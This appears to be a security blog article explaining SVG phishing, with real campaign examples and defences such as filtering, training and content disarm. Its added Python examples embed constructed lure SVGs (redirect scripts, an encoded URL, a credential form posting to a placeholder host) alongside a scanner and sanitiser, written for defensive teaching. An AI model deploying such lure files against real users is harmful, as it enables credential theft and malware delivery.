Phishing is one of the oldest cybercrime techniques in the book. Indeed, the first phishing email is thought to have originated back in the mists of time, around the year 1995. However, that doesn’t mean cybercriminals haven’t got creative in the years since. Added to recent innovations like smishing and Facebook Messenger scams, there’s a new threat to contend with: SVG phishing.
Here’s everything you need to know about this new threat, including what it is, how it works and, most importantly, how to counter it.
What is SVG phishing?
SVG phishing refers to the use of Scalable Vector Graphics (SVG) files in phishing attacks. SVG is an image format for two-dimensional graphics, popular in web and graphic design because images scale up and down without losing quality. Unlike a JPEG or PNG, though, an SVG is not a bitmap but an XML text document, and the format allows that document to carry JavaScript, clickable links and even embedded HTML. That is exactly what makes it useful to an attacker.
Cybercriminals use these files to deliver malware or to direct victims to spoofed login forms that steal their credentials.
Why do cybercriminals use SVG phishing attacks?
SVG phishing has gained traction in the cyber underworld because it evades many traditional security measures. Email security tools tend to treat an SVG attachment as a harmless image and concentrate their inspection on more commonly abused file types like PDFs and Office documents, so the script inside an SVG often goes unexamined. This allows phishing emails containing SVG attachments to slip past many email filters, giving cybercriminals a route into target organisations.
How do SVG phishing attacks work in practice?
In practice, SVG attacks work much like any other phishing scam. Typically, a cybercriminal disguises the SVG file as a legitimate document or request, using social engineering techniques to convince victims to open it.
It could be a request to edit a file from your ‘boss’ or a report that ‘requires your attention right now’. Either way, the techniques are no more sophisticated than a typical phishing scam.
Once opened in a web browser, which is the default handler for .svg files on many systems, any JavaScript embedded in the file runs. It can redirect the user to a malicious website, display a fake login form designed to capture passwords and other sensitive information, or trigger the download of a malware payload onto company systems.
However, while many SVG attacks aren’t particularly sophisticated, cybercriminals are getting smarter about how they launch them. Some campaigns have used SVG images that mimic documents such as Excel spreadsheets, with an HTML credential-harvesting form embedded in the image itself.
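To make the mechanics concrete, here is an added example that is not code from the original article: a constructed lure SVG that redirects to a fake login page in three of the ways described above (an onload handler, a javascript: link and a script with a base64-encoded URL), alongside the checks an email filter would need to run on it. The URLs are placeholders under example.com, not indicators from any real campaign, and the function names are our own.

```python
# Added example, not code from the original article: a constructed lure SVG
# of the kind described above, plus the checks an email filter needs to apply
# to it. All URLs are placeholders under example.com, not real campaign data.
import base64
import re
import xml.etree.ElementTree as ET

# Constructed sample (hypothetical): draws a harmless "spreadsheet" preview,
# but opened directly in a browser it redirects to a fake login page three
# different ways: an onload handler, a javascript: link, and a <script> whose
# URL is base64-encoded to slip past naive keyword filters.
PHISH_URL = "https://login.example.com/verify"
ENCODED = base64.b64encode(PHISH_URL.encode()).decode()

LURE_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink"
     width="600" height="400"
     onload="location.href='__URL__'">
  <rect width="600" height="400" fill="#ffffff"/>
  <text x="40" y="60" font-size="20">Invoice_Q3.xlsx - click to open</text>
  <a xlink:href="javascript:window.open('__URL__')">
    <text x="40" y="120" fill="blue">Open document</text>
  </a>
  <script><![CDATA[
    var u = atob("__B64__");
    setTimeout(function () { location.href = u; }, 500);
  ]]></script>
</svg>
""".replace("__URL__", PHISH_URL).replace("__B64__", ENCODED)

# A genuinely static logo, for comparison.
BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <circle cx="50" cy="50" r="40" fill="#1f77b4"/>
</svg>
"""

EVENT_ATTR = re.compile(r"^on[a-z]+$")          # onload, onclick, onmouseover ...
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def _local(name: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return name.split("}")[-1]


def _urls_in_base64(text: str) -> set:
    """Decode base64-looking runs and return any URLs hidden inside them."""
    found = set()
    for blob in B64_RE.findall(text):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "ignore")
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        found.update(URL_RE.findall(decoded))
    return found


def scan_svg(data: str) -> dict:
    """Return the active-content indicators found in an SVG document."""
    root = ET.fromstring(data)
    findings = {"scripts": 0, "foreign_objects": 0, "event_handlers": [],
                "javascript_urls": [], "external_urls": set(), "encoded_urls": set()}
    for el in root.iter():
        tag = _local(el.tag)
        if tag == "script":
            findings["scripts"] += 1
            findings["external_urls"].update(URL_RE.findall(el.text or ""))
            findings["encoded_urls"].update(_urls_in_base64(el.text or ""))
        elif tag == "foreignObject":  # can wrap a full HTML login form
            findings["foreign_objects"] += 1
        for attr, value in el.attrib.items():
            name = _local(attr)
            if EVENT_ATTR.match(name):
                findings["event_handlers"].append(name)
                findings["external_urls"].update(URL_RE.findall(value))
            elif name == "href":
                if value.strip().lower().startswith("javascript:"):
                    findings["javascript_urls"].append(value.strip())
                else:
                    findings["external_urls"].update(URL_RE.findall(value))
    return findings


def is_suspicious(findings: dict) -> bool:
    """None of these belongs in an image attachment."""
    return bool(findings["scripts"] or findings["foreign_objects"]
                or findings["event_handlers"] or findings["javascript_urls"]
                or findings["encoded_urls"])


if __name__ == "__main__":
    for label, doc in (("lure", LURE_SVG), ("benign", BENIGN_SVG)):
        f = scan_svg(doc)
        print(label, "suspicious" if is_suspicious(f) else "clean", f)
```

The scanner parses the attachment as XML rather than grepping it, which is the point: a filter that only looks for the string `http` in the file misses the base64-encoded URL, and one that only looks for `<script>` misses the onload handler and the javascript: link. Treating any script, event handler, javascript: URL or foreignObject as disqualifying is safe because a legitimate logo or diagram needs none of them.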
Are there any famous examples?
SVG phishing techniques have been in use since at least 2015, but media reports tend not to differentiate them from other types of phishing. Nevertheless, there are a couple of recent examples that researchers have identified.
1. Agent Tesla Keylogger: January – February 2024
Agent Tesla is a keylogger. It monitors keystrokes, takes screenshots, and steals passwords from various applications before sending the data back to the attackers. It isn’t a new form of malware; cybercriminals have been using it since around 2014, but in 2024 they started delivering it via SVG files.
This campaign used an SVG disguised as a Microsoft Excel spreadsheet, delivered via phishing emails. Once the victim opened the ‘spreadsheet’, an embedded script ran and Agent Tesla was installed.
2. XWorm RAT: December 2023 – present
The catchily named XWorm RAT is another form of malware, a remote access trojan used for keylogging and stealing cryptocurrency wallets.
These campaigns used various techniques. Some used links embedded in phishing emails, while others attached the SVG files directly. Once opened, the SVG files initiated the download of zip archives containing XWorm RAT, infecting the victim’s machine.
For some great examples of real-world SVG campaigns, we recommend checking out Cofense’s excellent phishing database.
What can you do to protect your business?
There’s no doubt SVG phishing poses a serious threat, able to avoid detection by many email filtering tools. But that doesn’t mean there’s nothing you can do to protect your business.
Staff training
We’re always championing the benefits of staff security training, but it’s particularly important when it comes to phishing. By their nature, phishing campaigns rely on social engineering techniques so, if you can train staff to recognise the tell-tale signs, you can effectively neuter the threat.
What training looks like will depend on the expertise within your organisation. You could implement realistic phishing simulations to test employee awareness, or something simpler like webinars and videos. However you approach it, the key is that employees can quickly recognise suspicious emails and attachments. For SVG, that means treating an ‘image’ that asks you to open a document or sign in with the same suspicion as an unexpected executable.
Limit SVG Handling
One surefire way to mitigate the threat posed by SVG phishing is to limit what your email client and browser will do with an SVG. The script in an SVG does not run when the file is displayed as an inline image, but it does run when the file is opened directly in a browser, which is the default handler for .svg attachments on many systems. Change that default so double-clicking an SVG opens a plain image viewer or text editor rather than a browser, and, where your email platform allows it, block .svg attachments from external senders outright. This stops the first stage of attacks like Agent Tesla or XWorm RAT, which need that script to run before they can fetch their payload.
Configure email filtering
In a similar vein to the previous point, more advanced email security solutions can analyse attachments for malicious content. Check whether yours inspects the XML inside SVG files for script elements, on* event handlers, javascript: links and embedded HTML forms, rather than treating the attachment as an opaque image. Many email providers can’t do this yet, which is part of the reason for the success of SVG phishing campaigns.
Use CDR Technology
Admittedly, this solution is likely to be beyond the financial reach of most small businesses. Content Disarm and Reconstruction (CDR) solutions are expensive and tend to be the preserve of large corporations and organisations with sizeable security budgets.
But if you’re feeling particularly flush, CDR is a great option for disarming SVG phishing. CDR systems treat all incoming files as potentially harmful: they take each file apart, keep only the parts needed to display it (for an SVG, the drawing elements), discard everything active or unknown, such as scripts, event handlers and embedded HTML, and rebuild a clean copy to send on to the recipient.
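To show what ‘deconstruct, strip, rebuild’ means for an SVG, here is an added example written for this article; it is not code from any CDR vendor or from the original page. It takes the approach CDR products take: rather than hunting for known-bad patterns, it builds a brand-new document from an allowlist of drawing elements and attributes, so scripts, event handlers, embedded HTML forms and external fetches are simply never copied across. The sample lure (a fake ‘sign in to view’ spreadsheet with an HTML form), the hostnames and the function names are all constructed for the example.

```python
# Added example, not code from the original article or any CDR vendor: a
# minimal Content Disarm and Reconstruction pass for SVG. It rebuilds a new
# document from an allowlist, so anything active is never copied across.
# Sample input, hostnames and function names are constructed for this example.
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"

# Enough to reproduce a static picture. Anything not listed is dropped.
ALLOWED_TAGS = {
    "svg", "g", "defs", "title", "desc", "path", "rect", "circle", "ellipse",
    "line", "polyline", "polygon", "text", "tspan", "linearGradient",
    "radialGradient", "stop", "clipPath",
}
ALLOWED_ATTRS = {
    "id", "x", "y", "x1", "y1", "x2", "y2", "cx", "cy", "r", "rx", "ry",
    "width", "height", "viewBox", "d", "points", "transform", "opacity",
    "fill", "fill-opacity", "stroke", "stroke-width", "stroke-opacity",
    "font-size", "font-family", "font-weight", "text-anchor", "offset",
    "stop-color", "clip-path",
}
# href, style and every on* handler are deliberately absent from the lists.
TEXT_TAGS = {"text", "tspan", "title", "desc"}
# url(...) may only point at an id inside this document, never a remote file.
REMOTE_URL_FUNC = re.compile(r"url\(\s*['\"]?\s*(?!#)")

# Constructed lure of the "document with a login form" kind: the
# <foreignObject> carries a real HTML form that posts credentials, and the
# <image> and the rect fill fetch from an external host as soon as it renders.
LURE_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" width="500" height="300">
  <title>Shared document</title>
  <rect width="500" height="300" fill="url(https://cdn.example.net/bg.svg#g)"/>
  <text x="20" y="40" font-size="18">Sign in to view Payroll_2024.xlsx</text>
  <image xlink:href="https://cdn.example.net/excel-logo.png" x="20" y="60"
         width="64" height="64"/>
  <foreignObject x="20" y="140" width="460" height="140">
    <form xmlns="http://www.w3.org/1999/xhtml" method="post"
          action="https://login.example.com/collect">
      <input name="user" placeholder="Email"/>
      <input name="pass" type="password" placeholder="Password"/>
      <button>Sign in</button>
    </form>
  </foreignObject>
</svg>
"""


def _local(name: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return name.split("}")[-1]


def _value_ok(value: str) -> bool:
    """Reject attribute values that would make the renderer fetch a remote URL."""
    return not REMOTE_URL_FUNC.search(value)


def _rebuild(el, removed):
    """Copy only allowlisted parts of `el` into a fresh element."""
    tag = _local(el.tag)
    new = ET.Element(el.tag)
    for attr, value in el.attrib.items():
        if _local(attr) in ALLOWED_ATTRS and _value_ok(value):
            new.set(attr, value)
        else:
            removed.append(f"attribute {_local(attr)} on <{tag}>")
    if tag in TEXT_TAGS:
        new.text = el.text
    for child in el:
        ctag = _local(child.tag)
        if ctag in ALLOWED_TAGS:
            rebuilt = _rebuild(child, removed)
            if tag in TEXT_TAGS:
                rebuilt.tail = child.tail  # keep text between <tspan>s
            new.append(rebuilt)
        else:
            removed.append(f"element <{ctag}>")
    return new


def disarm_svg(data: str):
    """Return (clean_svg, removed_items) for one SVG document."""
    root = ET.fromstring(data)
    if root.tag != f"{{{SVG_NS}}}svg":
        raise ValueError("not an SVG document")
    removed = []
    clean = _rebuild(root, removed)
    ET.register_namespace("", SVG_NS)  # serialise with a default xmlns
    return ET.tostring(clean, encoding="unicode"), removed


if __name__ == "__main__":
    cleaned, removed = disarm_svg(LURE_SVG)
    print(cleaned)
    print("removed:", removed)
```

The allowlist is the design choice that matters. A denylist of `<script>`, `on*` and `foreignObject` is only as good as the attacker’s imagination; an allowlist means a new trick (an external `url()` in a fill, an unfamiliar element) is dropped by default, and the `removed` list tells your analysts what the attachment was trying to do. The price is that legitimate but unusual SVGs lose features, which is why real CDR products ship long allowlists and why the rebuilt copy, not the original, is what reaches the inbox.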
Put policies in place
If your staff don’t understand the dangers of SVG files or the safe behaviours expected of them, they’re much more likely to fall prey to a scam.
Develop policies for handling email attachments, especially those from unknown or dubious sources. You could also consider blocking certain file types in email communications unless they’re absolutely necessary for operations, and for most small businesses an SVG attachment from outside the organisation is an obvious candidate.
Once you’ve set these policies, you need to ensure employees adhere to them. The best way to do this is to make them readily available (they’re no use buried in a long-forgotten corner of a shared drive) and log who’s read them.
Dangerous, but avoidable...
SVG phishing is dangerous, but it doesn’t have to be an insurmountable problem. By implementing these strategies, your business can significantly reduce the risks and protect company data.
Want to know more about the threats facing small businesses like yours? Check out our latest research report on the mobile threats facing SMEs.